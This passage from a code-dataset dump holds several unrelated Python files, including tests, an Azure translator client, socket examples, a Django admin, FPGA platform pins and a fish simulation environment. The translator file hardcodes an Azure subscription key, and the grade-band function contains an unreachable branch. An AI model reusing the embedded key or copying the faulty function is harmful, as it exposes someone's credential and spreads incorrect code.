any given URL)\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=200,\n content=json.dumps({'hello': {0: 'world'}})\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n loader.files['test-json'] = {\n 'path': 'test.json',\n 'parser': dataset.loader.ExternalDataLoader.parse_json\n }\n\n # Try to fetch the file\n first_result = loader.get('test-json')\n\n # Now try to fetch the file for the second time\n second_result = loader.get('test-json')\n\n # Check whether the URL is called only once and whether the results are equal\n self.assertDictEqual(first_result.to_dict(), second_result.to_dict())\n self.assertEqual(1, dataset.loader.requests.call_count)\n\n def test_ignore_cache(self):\n # Fake a response (for any given URL)\n dataset.loader.requests = self.FakeRequests(self.FakeResponse(\n status_code=200,\n content=json.dumps({'hello': {0: 'world'}})\n ))\n\n # Setup the external dataloader\n loader = dataset.loader.ExternalDataLoader()\n loader.files['test-json'] = {\n 'path': 'test.json',\n 'parser': dataset.loader.ExternalDataLoader.parse_json\n }\n\n # Try to fetch the file\n first_result = loader.get('test-json', ignore_cache=True)\n\n # Now try to fetch the file for the second time\n second_result = loader.get('test-json', ignore_cache=True)\n\n # Check whether the URL is called every time (since the ignore_cache flag is true) and whether the results are\n # equal\n self.assertDictEqual(first_result.to_dict(), second_result.to_dict())\n self.assertEqual(2, dataset.loader.requests.call_count)\n","sub_path":"tests/test_dataset_loader_external_data_loader.py","file_name":"test_dataset_loader_external_data_loader.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"222350450","text":"\"\"\"\r\nthis is a simple class to translate long texts using free Translator(F0) service, which is provided by MS Azure.\r\n\r\nit has the following functionalities:\r\n- translates from A language to B language\r\n- displays translation result\r\n- lang list: [https://docs.microsoft.com/en-us/azure/cognitive-services/translator/language-support]\r\n\r\nChangelog\r\n- v0.0.1, initial version\r\n\r\n@ZL, 20210121\r\n\r\n\"\"\"\r\n\r\nimport requests, uuid, json\r\n\r\nclass AzureTranslator:\r\n # Add your subscription key and endpoint\r\n __subscription_key = \"399a485f234544dcb07d2723ff65186a\" # key may expire. have to freshen it from your subscription\r\n __endpoint = \"https://api.cognitive.microsofttranslator.com/\"\r\n\r\n # Add your location, also known as region. 
The default is global.\r\n # This is required if using a Cognitive Services resource.\r\n __location = \"japaneast\"\r\n\r\n __path = '/translate'\r\n __constructed_url = __endpoint + __path\r\n\r\n def __init__(self, raw_text: str, from_lang_code: str = 'ja', to_lang_code: str = 'zh-Hans'):\r\n self.params = {\r\n 'api-version': '3.0',\r\n 'from': 'ja', # from lang code\r\n 'to': 'zh-Hans' # to lang code\r\n }\r\n self.constructed_url = self.__endpoint + self.__path\r\n\r\n self.headers = {\r\n 'Ocp-Apim-Subscription-Key': self.__subscription_key,\r\n 'Ocp-Apim-Subscription-Region': self.__location,\r\n 'Content-type': 'application/json',\r\n 'X-ClientTraceId': str(uuid.uuid4())\r\n }\r\n\r\n # You can pass more than one object in body.\r\n self.body = [{\r\n 'text': raw_text\r\n }]\r\n\r\n def start(self):\r\n request = requests.post(self.__constructed_url, params=self.params, headers=self.headers, json=self.body)\r\n response = request.json()\r\n # res = json.dumps(response, sort_keys=True, ensure_ascii=False, indent=4, separators=(',', ': '))\r\n res = response[0]['translations'][0]['text']\r\n return res","sub_path":"side-pkg-aurora/translator/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"148147443","text":"from os import listdir\nfrom os.path import isfile, join\n\n\npath = input(\"Directory >: \")\nfile_list = [f for f in listdir(path) if isfile(join(path, f))]\n\nf = open(\"filesindir.txt\", 'w')\nfor file in file_list:\n string = \"project/\" + file + \"\\n\"\n print(string)\n f.write(string)\n\nf.close()\n","sub_path":"bot/getfiles.py","file_name":"getfiles.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"185356298","text":"def faixa_notas (lista):\n lista1 = 0\n lista2 = 0\n lista3 = 0\n for x in lista:\n if x <=7:\n lista2 +=1\n elif x < 5:\n lista1 +=1\n else:\n lista3 +=1\n resultado = [lista1,lista2,lista3]\n return resultado\n \n ","sub_path":"backup/user_052/ch140_2020_04_01_20_03_29_563193.py","file_name":"ch140_2020_04_01_20_03_29_563193.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"462628984","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\nimport unittest\nfrom src.fibonacci import fib\n\n\nclass TestFibonacciNumbers(unittest.TestCase):\n\n def test_zero(self):\n self.assertEqual(fib(0), 0)\n\n def test_simple(self):\n test_cases = [\n (1, 1),\n (2, 1),\n (3, 2),\n (4, 3),\n (5, 5),\n (10, 55)\n ]\n\n for n, fib_n in test_cases:\n with self.subTest(i=n):\n self.assertEqual(fib(n), fib_n)\n\n def test_negative(self):\n with self.subTest(i=1):\n self.assertRaises(ArithmeticError, fib, -1)\n\n with self.subTest(i=1):\n self.assertRaises(ArithmeticError, fib, -10)\n\n def test_fractional(self):\n self.assertRaises(ArithmeticError, fib, 2.5)\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"459193015","text":"import random\nabc = 'gxvxgxvegxvegxv'\ndef DWEXAGEDTLSFILE()-> str:\n recordtype = '{:0>1}'.format(95353)[:1]\n Agent_ID = '{:<6}'.format('d53dtetge')[:6]\n Agent_date_cease ='{:<8}'.format('16753434')[:8]\n Agent_name = '{:<56}'.format('Bobby')[:56]\n Successor_agent_ID = 
'{:<6}'.format('56')[:6]\n Telephone_no = '{:<20}'.format(19970630)[:20]\n ORG_unit_ID = '{:<6}'.format('d53dtetge')[:6]\n address1 = '{:<28}'.format(abc)[:28]\n address2 = '{:<28}'.format(abc)[:28]\n address3 = '{:<28}'.format(abc)[:28]\n address4 = '{:<18}'.format(abc)[:18]\n agent_postcode = '{:<8}'.format('ex44778347'[:4])\n agent_RLS_signal = '{:0>1}'.format('y')[:1]\n agent_abroad_signal = '{:0>1}'.format('y')[:1]\n return (recordtype + Agent_ID + Agent_date_cease + Agent_name + Successor_agent_ID + Telephone_no + ORG_unit_ID + address1 + address2 + address3 + address4 + agent_postcode + agent_RLS_signal + agent_abroad_signal)\n #return (recordtype + UTR + Date1 + Date2)\n #return line1\nf1 = DWEXAGEDTLSFILE()\nprint (f1)\n","sub_path":"DWEXAGEDTLSFILE.py","file_name":"DWEXAGEDTLSFILE.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"381179305","text":"# This file is Copyright (c) 2019 (year 0 AG) Antti Lukats \n# This file is Copyright (c) 2014-2019 Florent Kermarrec \n# License: BSD\n\n# info about the board http://trenz.org/cyc1000-info\n\nfrom litex.build.generic_platform import *\nfrom litex.build.altera import AlteraPlatform\nfrom litex.build.altera.programmer import USBBlaster\n\n# IOs ----------------------------------------------------------------------------------------------\n\n_io = [\n (\"clk12\", 0, Pins(\"M2\"), IOStandard(\"3.3-V LVTTL\")), # 12MHz clock\n (\"user_led\", 0, Pins(\"M6\"), IOStandard(\"3.3-V LVTTL\")), # LED1\n\n (\"sw\", 0, Pins(\"N6\"), IOStandard(\"3.3-V LVTTL\")), # user\n\n (\"serial\", 0,\n Subsignal(\"tx\", Pins(\"T7\"), IOStandard(\"3.3-V LVTTL\")),\n Subsignal(\"rx\", Pins(\"R7\"), IOStandard(\"3.3-V LVTTL\"))\n ),\n\n (\"spiflash\", 0,\n Subsignal(\"cs_n\", Pins(\"D2\")),\n Subsignal(\"clk\", Pins(\"H1\")),\n Subsignal(\"mosi\", Pins(\"C1\")),\n Subsignal(\"miso\", Pins(\"H2\")),\n IOStandard(\"3.3-V LVTTL\"),\n ),\n\n\n (\"sdram_clock\", 0, Pins(\"B14\"), IOStandard(\"3.3-V LVTTL\")),\n (\"sdram\", 0,\n Subsignal(\"a\", Pins(\"A3 B5 B4 B3 C3 D3 E6 E7 D6 D8 A5 E8\")), #0, 1, ...\n Subsignal(\"ba\", Pins(\"A4 B6\")),\n Subsignal(\"cs_n\", Pins(\"A6\")),\n Subsignal(\"cke\", Pins(\"F8\")),\n Subsignal(\"ras_n\", Pins(\"B7\")),\n Subsignal(\"cas_n\", Pins(\"C8\")),\n Subsignal(\"we_n\", Pins(\"A7\")),\n Subsignal(\"dq\", Pins(\"B10 A10 B11 A11 A12 D9 B12 C9 D11 E11 A15 E9 D14 F9 C14 A14\")),\n Subsignal(\"dm\", Pins(\"B13 D12\")),\n IOStandard(\"3.3-V LVTTL\")\n ),\n\n\n (\"gpio_leds\", 0,\n Pins(\"M6 T4 T3 R3 T2 R4 N5 N3\"),\n IOStandard(\"3.3-V LVTTL\")\n ),\n\n # all IO not connected to peripherals mapped to MFIO\n # <- LEDS -> <- PMOD -> <- D0..D14, D11R, D12R -> <- AIN0..AIN7, AIN -> [C O I S i1 i2]\n (\"bbio\", 0, Pins(\"M6 T4 T3 R3 T2 R4 N5 N3 F13 F15 F16 D16 D15 C15 B16 C16 N16 L15 L16 K15 K16 J14 N2 N1 P2 J1 J2 K2 L2 K1 L1 R12 T13 R13 T14 P14 R14 T15 R11 T12 F3 G2 G1 D1 B1 C2\"),\n IOStandard(\"3.3-V LVTTL\")),\n\n\n]\n\n# Platform -----------------------------------------------------------------------------------------\n\nclass Platform(AlteraPlatform):\n default_clk_name = \"clk12\"\n default_clk_period = 83\n\n def __init__(self):\n AlteraPlatform.__init__(self, \"10CL025YU256C8G\", _io)\n self.add_platform_command(\"set_global_assignment -name FAMILY \\\"Cyclone 10 LP\\\"\")\n# self.add_platform_command(\"set_global_assignment -name ENABLE_CONFIGURATION_PINS OFF\")\n self.add_platform_command(\"set_global_assignment -name 
INTERNAL_FLASH_UPDATE_MODE \\\"SINGLE IMAGE WITH ERAM\\\"\")\n\n self.add_platform_command('set_global_assignment -name CYCLONEII_RESERVE_NCEO_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n self.add_platform_command('set_global_assignment -name RESERVE_DATA0_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n self.add_platform_command('set_global_assignment -name RESERVE_DATA1_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n self.add_platform_command('set_global_assignment -name RESERVE_FLASH_NCE_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n self.add_platform_command('set_global_assignment -name RESERVE_DCLK_AFTER_CONFIGURATION \"USE AS REGULAR IO\"')\n\n\n\n\n\n def create_programmer(self):\n return USBBlaster()\n","sub_path":"litex_boards/partner/platforms/cyc1000.py","file_name":"cyc1000.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"102521764","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom tvm.common import io\nfrom tvm.common import analytics\nfrom tvm.common.constants import U_CHECK, U_CROSS\n\nfrom tvm.common.dt_utils import moment_ago\nfrom tvm.common.settings import settings\nfrom tvm.common.tvcollection import TVCollection\nfrom tvm.common.tvcollection import TVCollectionExtension\nfrom tvm.common.table import pad_table\nfrom tvm.common.table import print_table as print_generated_table\n\n\ndef _get_completion_status(series, is_completed):\n if is_completed:\n return U_CHECK\n ratio = analytics.get_percentage_completed(TVCollection, series)\n ratio_ = '[ {0:02d}% ]'.format(ratio)\n return U_CROSS + ' ' + ('[ - ]' if ratio == 0 else ratio_)\n\n\ndef generate_table(new=False, popular=False, anime=False):\n table = [['series title', 'last updated', 's&e', 'last watched', '']]\n\n for title, series in TVCollection.sort('title'):\n # If popular and series is not popular, ignore.\n if popular and title not in settings['POPULAR_SERIES']:\n continue\n\n # If completed and we're only looking for \"new\" series, ignore.\n is_completed = TVCollectionExtension.is_completed(series)\n if new and is_completed:\n continue\n\n # If not an anime but we're looking for anime, ignore.\n if anime and not TVCollectionExtension.is_anime(series):\n continue\n\n last_viewed = series['last_viewed'] or None\n last_updated = series['last_updated']\n latest_episode = series['latest']\n\n table.append([\n title,\n moment_ago(last_updated['recorded_at']),\n '(%s,%s)' % (latest_episode['season'], latest_episode['episode']),\n moment_ago(last_viewed['viewed_at'][-1] if last_viewed else None),\n ' ' * 3 + _get_completion_status(series, is_completed)\n ])\n return table\n\n\ndef _determine_season_status(episodes, viewed_episodes):\n if len(viewed_episodes) == len(episodes):\n return 'completed'\n if not viewed_episodes:\n return 'pending'\n return 'incomplete'\n\n\ndef _get_season_completion(episodes, viewed_episodes):\n season_status = ' [ {percentage}% | {viewed}/{total} ]'.format(**{\n 'percentage': int((len(viewed_episodes) / len(episodes)) * 100),\n 'viewed': len(viewed_episodes),\n 'total': len(episodes)\n })\n completion = U_CROSS\n if len(viewed_episodes) == len(episodes):\n completion = U_CHECK\n return completion + season_status\n\n\ndef _get_episode_view_status(episode):\n if len(episode['viewed_at']) <= 1:\n return U_CHECK if episode['viewed_at'] else U_CROSS\n return '%s 
\\033[0;33m(%s times)\\033[0m' % (U_CHECK, len(episode['viewed_at']))\n\n\ndef generate_tree(series, expand):\n table = [['s&e', 'last viewed', 'status']] if expand else []\n\n sorted_seasons = TVCollection.sort('season', seasons=series['seasons'])\n for season, episodes in sorted_seasons:\n viewed_episodes = [e for e in episodes if e['viewed_at']]\n\n status = _determine_season_status(episodes, viewed_episodes)\n if status == 'completed' and not expand:\n table.append(['s%s' % season, U_CHECK])\n elif status in ['pending', 'incomplete'] and not expand:\n episode_status = U_CROSS + ' [ {0:2d} ]'.format(len(episodes))\n table.append(['s%s' % season, episode_status])\n else:\n completion = _get_season_completion(episodes, viewed_episodes)\n table.append(['s%s' % season, '', completion])\n\n sorted_episodes = TVCollection.sort('episode', episodes=episodes)\n for i, episode in enumerate(sorted_episodes):\n table.append([\n ('~~|- %s' if i == 0 else ' |- %s') % episode['episode'],\n moment_ago(episode['viewed_at'][-1]) if episode['viewed_at'] else '--',\n _get_episode_view_status(episode)\n ])\n return table\n\n\ndef _print_recent_summary(last_updated, last_viewed):\n if last_viewed:\n last_updated.update({'recorded_at': moment_ago(last_updated['recorded_at'])})\n io.info2('last updated: \"{title},{season},{episode}\" ({recorded_at})'.format(**last_updated))\n\n if last_viewed:\n last_viewed.update({'viewed_at': moment_ago(last_viewed['viewed_at'][-1])})\n io.info2('last watched: \"{title},{season},{episode}\" ({viewed_at})'.format(**last_viewed))\n\n\ndef print_table(table):\n if len(table) == 1:\n return io.info('No series found')\n\n padded_table = pad_table(table, padding=3)\n print_generated_table(padded_table)\n io.info('{displayed} series displayed ({total} total, {completed}% completed)'.format(**{\n 'displayed': len(padded_table) - 1,\n 'total': len(TVCollection.collection),\n 'completed': analytics.get_percentage_completed(TVCollection)\n }))\n return _print_recent_summary(\n TVCollectionExtension.get_last_updated_episode(),\n TVCollectionExtension.get_last_viewed_episode()\n )\n\n\ndef print_tree(tree, series):\n padded_tree = pad_table(tree, padding=2)\n for row in padded_tree:\n io.info2(''.join(map(unicode, row)))\n\n percentage_completed = analytics.get_percentage_completed(TVCollection, series)\n data = {\n 'percentage': percentage_completed,\n 'viewed': series['episodes_viewed'],\n 'total': series['total_episodes'],\n }\n io.info('{percentage}% ({viewed}/{total}) episodes watched'.format(**data))\n _print_recent_summary(series['last_updated'], series['last_viewed'])\n","sub_path":"tvm/apps/list/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442121130","text":"import socket\n\nsock = socket.socket()\nprint(\"Socket successfully created...\")\nhost = socket.gethostname()\nprint(\"Socket created on: \" + str(sock.getsockname()) + \"...\")\nport = 26138\nprint(\"Opening port \" + str(port) + \" for communication...\")\nsock.bind((host, port))\nsock.listen(5)\nprint(str(sock.getsockname()))\nboard = [2, 3, 4, 5, 6, 7, 8, 9, 10]\n\nwhile True:\n print(\"Server Started. 
Awaiting Connection....\")\n c, address = sock.accept()\n print(\"Connection established from: \" + repr(address[1]))\n # c.send(\"Connection established\")\n c.send(str(board).strip(\"[]\"))\n c.close()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649500140","text":"from django.contrib import admin\nfrom django.utils.html import mark_safe # 장고에게 사진을 믿을 수 있다는 확신을 주려고\nfrom . import models\n\n@admin.register(models.RoomType, models.Facility, models.Amenity, models.HouseRule)\nclass ItemAdmin(admin.ModelAdmin):\n\n list_display = (\n \"name\", \"used_by\"\n )\n\n def used_by(self, obj):\n return obj.rooms.count()\n\n\nclass PhotoInline(admin.StackedInline):\n model = models.Photo\n\n@admin.register(models.Room)\nclass RoomAdmin(admin.ModelAdmin):\n \n \"\"\"Room Admin Definition\"\"\"\n\n inlines = (PhotoInline,)\n fieldsets = (\n (\n \"Basic Info\",\n {\n \"fields\": (\n \"name\",\n \"description\",\n \"country\",\n \"city\",\n \"address\",\n \"price\",\n \"room_type\",\n )\n },\n ),\n (\"Times\", {\"fields\": (\"check_in\", \"check_out\", \"instant_book\")}),\n (\"Spaces\", {\"fields\": (\"guests\", \"beds\", \"bedrooms\", \"baths\")}),\n (\n \"More About the Space\",\n {\"fields\": (\"amenities\", \"facilities\", \"house_rules\")},\n ),\n (\"Last Details\", {\"fields\": (\"host\",)}),\n )\n\n list_display = (\n \"name\", \"country\", \"city\", \"price\", \"guests\", \"beds\", \"bedrooms\", \"baths\", \"check_in\", \"check_out\", \n \"instant_book\", \"count_amenities\", \"count_photos\", \"total_rating\",\n )\n\n list_filter = (\"instant_book\", \"host__superhost\", \"room_type\", \"amenities\", \"facilities\", \"house_rules\", \"city\", \"country\",)\n \n raw_id_fields = (\"host\",)\n \n # seoul을 Seoul로 event intercept 하는 방법 seoul이라고 적어도 Seoul로 저장됨.\n # 아이템이 하나라고 해도 끝에 꼭 ,를 붙여줘야함. 
(\"=city\",) 이래야 형식이 유지됨.\n search_fields = (\"=city\", \"^host__username\")\n\n def count_amenities(self, obj):\n #self > roomadmin, obj > 현재 row\n # obj를 프린트하면 jousha tree house가 나옴\n # print(obj.amenities.all()) 하면 ]>가 나옴\n return obj.amenities.count()\n count_amenities.short_description = \"hello sexy!\"\n\n def count_photos(self, obj):\n return obj.photos.count()\n # rooms 안에 photos라는 related name이 있다는걸 앎\n\n@admin.register(models.Photo)\nclass PhotoAdmin(admin.ModelAdmin):\n \"\"\" Photo Admin \"\"\"\n list_display = (\"__str__\", \"get_thumbnail\")\n\n def get_thumbnail(self, obj):\n return mark_safe(f'')\n\n get_thumbnail.short_description = \"Thumbnail\"","sub_path":"rooms/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"198169741","text":"import socket\nimport sys\n\nserverIP = '127.0.0.1'\nserverPort = 2346\n\nclnt_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclnt_sock.connect((serverIP, serverPort))\nprint(\"Connect to Server...\")\n\nclient_msg = sys.argv[1]\nclnt_sock.send(client_msg.encode())\n\nprint(\"Send Message to Server..\")\ndata = clnt_sock.recv(1024)\n\nparse_data = (data.decode()).split('\\n\\n')\ncheck = (parse_data[0].split())[1] # 200 or 404\n\nif check == '200':\n f = open('recv.html', 'w')\n f.write(parse_data[1])\n f.close\n print('Received Message from Server')\nelse:\n print('404 Not Found')\n\nclnt_sock.close()\n\n","sub_path":"2018/Computer Network/CN_201402448_한진영_03/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"551634606","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\ndef usingLoops(a,b,j):\n multiplication = np.random.rand(j,j)\n start = time.time()\n for i in range(len(a)):\n for j in range(len(b[0])):\n for k in range(len(b)):\n multiplication[i][j] += a[i][k]*b[k][j]\n \n timeTaken = time.time() - start\n print(timeTaken, multiplication)\n\n return timeTaken\n\ndef usingNumpy(a,b):\n c = time.time()\n print(a.dot(b))\n timeTaken2 = time.time() - c\n\n return timeTaken2\n\ndef plot(D):\n plt.bar(range(len(D)), list(D.values()), align='center')\n plt.xticks(range(len(D)), list(D.keys()))\n plt.show()\n\nif __name__ == \"__main__\":\n val1 = {100:0,200:0,400:0}\n val2 = {100:0,200:0,400:0}\n \n firstMatrix = np.random.rand(100,100)\n secondMatrix = np.random.rand(200,200)\n thirdMatrix = np.random.rand(400,400)\n \n li = [firstMatrix, secondMatrix, thirdMatrix]\n j = 100\n\n for i in li:\n val1[j] = usingLoops(i,i,j)\n val2[j] = usingNumpy(i,i)\n j *=2\n\n print(val1, val2)\n\n sizes = [100,200,400]\n for j in sizes:\n val1[j] = val1[j]*1000\n val2[j] = val2[j]*1000\n\n print(val1, val2)\n\n plot(val1)\n plot(val2)","sub_path":"plotcompare.py","file_name":"plotcompare.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"456890934","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pymunk\n\nfrom Environment.base_environment import BaseEnvironment\nfrom Environment.Fish.fish import Fish\nfrom Environment.Fish.continuous_fish import ContinuousFish\nfrom Environment.Fish.continuous_tethered_fish import ContinuousTetheredFish\nfrom Environment.Fish.tethered_fish import TetheredFish\n\n\nclass 
class ControlledStimulusEnvironmentContinuous(BaseEnvironment):\n    \"\"\"\n    This version is made with only the fixed projection configuration in mind.\n    As a result, it doesn't have walls, and the fish appears directly in the centre of the environment.\n    For this environment, the following stimuli are available: prey, predators.\n    \"\"\"\n\n    def __init__(self, env_variables, stimuli, realistic_bouts, using_gpu, tethered=True, set_positions=False, moving=False,\n                 random=False, reset_each_step=False, reset_interval=1, background=None, draw_screen=False):\n        super().__init__(env_variables, draw_screen, using_gpu)\n\n        if tethered:\n            self.fish = ContinuousTetheredFish(self.board, env_variables, self.dark_col, realistic_bouts)\n        else:\n            self.fish = ContinuousFish(self.board, env_variables, self.dark_col, realistic_bouts)\n        self.space.add(self.fish.body, self.fish.mouth, self.fish.head, self.fish.tail)\n\n        # TODO: Unify in future with other stimuli\n        self.prey_positions = {}\n        self.predator_positions = {}\n        self.set_positions = set_positions\n        self.random = random\n        self.reset_at_interval = reset_each_step\n        self.reset_interval = reset_interval\n\n        # Whole environment measurements.\n        board_height = env_variables[\"height\"]\n        board_width = env_variables[\"width\"]\n\n        # Wall coordinates\n        self.wall_1_coordinates = [[0, 0], [0, board_height]]\n        self.wall_2_coordinates = [[0, board_height], [board_width, board_height]]\n        self.wall_3_coordinates = [[1, 1], [board_width, 1]]\n        self.wall_4_coordinates = [[board_width, 1], [board_width, board_height]]\n\n        self.stimuli = stimuli\n\n        self.stimuli_information = {stimulus: {} for stimulus in stimuli}\n\n        self.create_walls()\n        self.reset()\n\n        if self.set_positions:\n            self.create_positional_information(stimuli)\n        else:\n            if self.random:\n                self.random_stimuli = stimuli\n            else:\n                self.unset_stimuli = stimuli\n        self.moving_stimuli = moving\n\n        self.edge_col = self.space.add_collision_handler(1, 3)\n        self.edge_col.begin = self.touch_wall\n        self.background = background\n        self.pred_fish_col = self.space.add_collision_handler(3, 5)\n        self.pred_fish_col.begin = self.no_collision\n        self.prey_fish_col = self.space.add_collision_handler(3, 2)\n        self.prey_fish_col.begin = self.no_collision\n\n        self.continuous_actions = True\n\n\n    def reset(self):\n        super().reset()\n        self.fish.body.position = (self.env_variables['width']/2, self.env_variables['height']/2)\n        self.fish.body.angle = 0\n        self.fish.body.velocity = (0, 0)\n        self.create_stimuli(self.stimuli)\n\n    def special_reset(self):\n        self.fish.body.position = (self.env_variables['width'] / 2, self.env_variables['height'] / 2)\n        self.fish.body.angle = 0\n        self.fish.body.velocity = (0, 0)\n        self.fish.hungry = 0\n\n    def simulation_step(self, action, save_frames=False, frame_buffer=None, activations=None):\n        if self.reset_at_interval and self.num_steps % self.reset_interval == 0:\n            self.special_reset()\n        if frame_buffer is None:\n            frame_buffer = []\n        self.fish.making_capture = False\n        reward = self.fish.take_action(action)\n\n        done = False\n\n        self.fish.hungry += (1 - self.fish.hungry)*self.env_variables['hunger_inc_tau']\n        self.fish.stress = self.fish.stress * self.env_variables['stress_compound']\n        if self.predator_body is not None:\n            self.fish.stress += 0.5\n\n        # According to the projection general mode:\n        if self.set_positions:\n            self.update_stimuli()\n        else:\n            if self.random:\n                self.update_random_stimuli()\n            else:\n                self.update_unset_stimuli()\n\n        for micro_step in range(self.env_variables['phys_steps_per_sim_step']):\n            
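# several small physics sub-steps per simulation step keep the pymunk solver stable\n            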
self.space.step(self.env_variables['phys_dt'])\n if self.fish.touched_edge:\n self.fish.touched_edge = False\n if self.show_all:\n self.board.erase(bkg=self.env_variables['bkg_scatter'])\n self.draw_shapes(visualisation=True)\n if self.draw_screen:\n self.board_image.set_data(self.output_frame(activations, np.array([0, 0]), scale=0.5)/255.)\n plt.pause(0.0001)\n\n self.fish.body.position = (self.env_variables['width'] / 2, self.env_variables['height'] / 2)\n self.fish.body.angle = 0\n self.fish.body.velocity = (0, 0)\n\n self.num_steps += 1\n self.board.erase(bkg=self.env_variables['bkg_scatter'])\n self.draw_shapes(visualisation=False)\n\n right_eye_pos = (-np.cos(np.pi/2-self.fish.body.angle) * self.env_variables['eyes_biasx'] + self.fish.body.position[0],\n +np.sin(np.pi/2-self.fish.body.angle) * self.env_variables['eyes_biasx'] + self.fish.body.position[1])\n left_eye_pos = (+np.cos(np.pi/2-self.fish.body.angle) * self.env_variables['eyes_biasx'] + self.fish.body.position[0],\n -np.sin(np.pi/2-self.fish.body.angle) * self.env_variables['eyes_biasx'] + self.fish.body.position[1])\n\n self.fish.left_eye.read(left_eye_pos[0], left_eye_pos[1], self.fish.body.angle)\n self.fish.right_eye.read(right_eye_pos[0], right_eye_pos[1], self.fish.body.angle)\n\n in_light = self.fish.body.position[0] > self.dark_col\n\n if self.env_variables['hunger'] and self.env_variables['stress']:\n internal_state = np.array([[in_light, self.fish.hungry, self.fish.stress]])\n elif self.env_variables['hunger']:\n internal_state = np.array([[in_light, self.fish.hungry]])\n elif self.env_variables['stress']:\n internal_state = np.array([[in_light, self.fish.stress]])\n else:\n internal_state = np.array([[in_light]])\n\n if save_frames or self.draw_screen:\n self.board.erase(bkg=self.env_variables['bkg_scatter'])\n self.draw_shapes(visualisation=True)\n self.board.apply_light(self.dark_col, 0.7, 1)\n self.fish.left_eye.show_points(left_eye_pos[0], left_eye_pos[1], self.fish.body.angle)\n self.fish.right_eye.show_points(right_eye_pos[0], right_eye_pos[1], self.fish.body.angle)\n if save_frames:\n frame_buffer.append(self.output_frame(activations, internal_state, scale=0.25))\n if self.draw_screen:\n self.board_image.set_data(self.output_frame(activations, internal_state, scale=0.5) / 255.)\n plt.pause(0.000001)\n\n observation = np.dstack((self.fish.readings_to_photons(self.fish.left_eye.readings),\n self.fish.readings_to_photons(self.fish.right_eye.readings)))\n\n return observation, reward, internal_state, done, frame_buffer\n\n def create_stimuli(self, stimuli):\n for stimulus in stimuli:\n if \"prey\" in stimulus:\n self.create_prey()\n elif \"predator\" in stimulus:\n self.create_predator()\n\n @staticmethod\n def get_distance_for_size(stimulus, degree_size):\n if \"prey\" in stimulus:\n return 298.97 * np.exp(-0.133 * degree_size)\n elif \"predator\" in stimulus:\n return 298.97 * np.exp(-0.133 * degree_size/25)\n else:\n return 180\n\n def place_on_curve(self, stimulus_key, index, distance, angle):\n b = distance * np.sin(angle) + self.fish.body.position[0]\n a = distance * np.cos(angle) + self.fish.body.position[1]\n if \"prey\" in stimulus_key:\n self.prey_bodies[index].position = (a, b)\n elif \"predator\" in stimulus_key:\n self.predator_bodies[index].position = (a, b)\n\n def update_random_stimuli(self):\n # TODO: Add in baseline feature.\n stimuli_to_delete = []\n for i, stimulus, in enumerate(self.random_stimuli.keys()):\n if self.num_steps % self.unset_stimuli[stimulus][\"interval\"] == 0:\n if 
self.random_stimuli[stimulus][\"steps\"] > self.num_steps:\n d = self.get_distance_for_size(stimulus, self.random_stimuli[stimulus][\"size\"])\n theta = np.random.uniform(-0.75, 0.75) * np.pi\n self.place_on_curve(stimulus, i, d, theta)\n else:\n stimuli_to_delete.append(stimulus)\n for stimulus in stimuli_to_delete:\n del self.stimuli[stimulus]\n\n def get_new_angle(self, duration, current_steps):\n if self.moving_stimuli is False:\n if current_steps < 1:\n return 0.75 * np.pi\n else:\n progression = current_steps / duration\n return ((1.5 * progression) - 0.75) * np.pi\n else:\n if self.moving_stimuli == \"Right\":\n if current_steps < 1:\n return 0.75 * np.pi\n else:\n progression = current_steps / duration\n return ((1.5 * progression) - 0.75) * np.pi\n else:\n if current_steps < 1:\n return -0.75 * np.pi\n else:\n progression = (duration - current_steps) / duration\n return ((1.5 * progression) - 0.75) * np.pi\n\n @staticmethod\n def get_distance_moved_on_arc(theta_1, theta_2, d):\n # new_d = np.sqrt((p1[0]-p2[0])^2+(p1[1]-p2[1])^2)\n # angle = np.arccos((2*(d^2)-new_d^2)/(4*new_d))\n angle = abs(abs(theta_2)-abs(theta_1))\n return angle * d\n\n def get_new_distance(self, stimulus, interval, current_steps):\n if current_steps%interval == 0:\n current_steps = 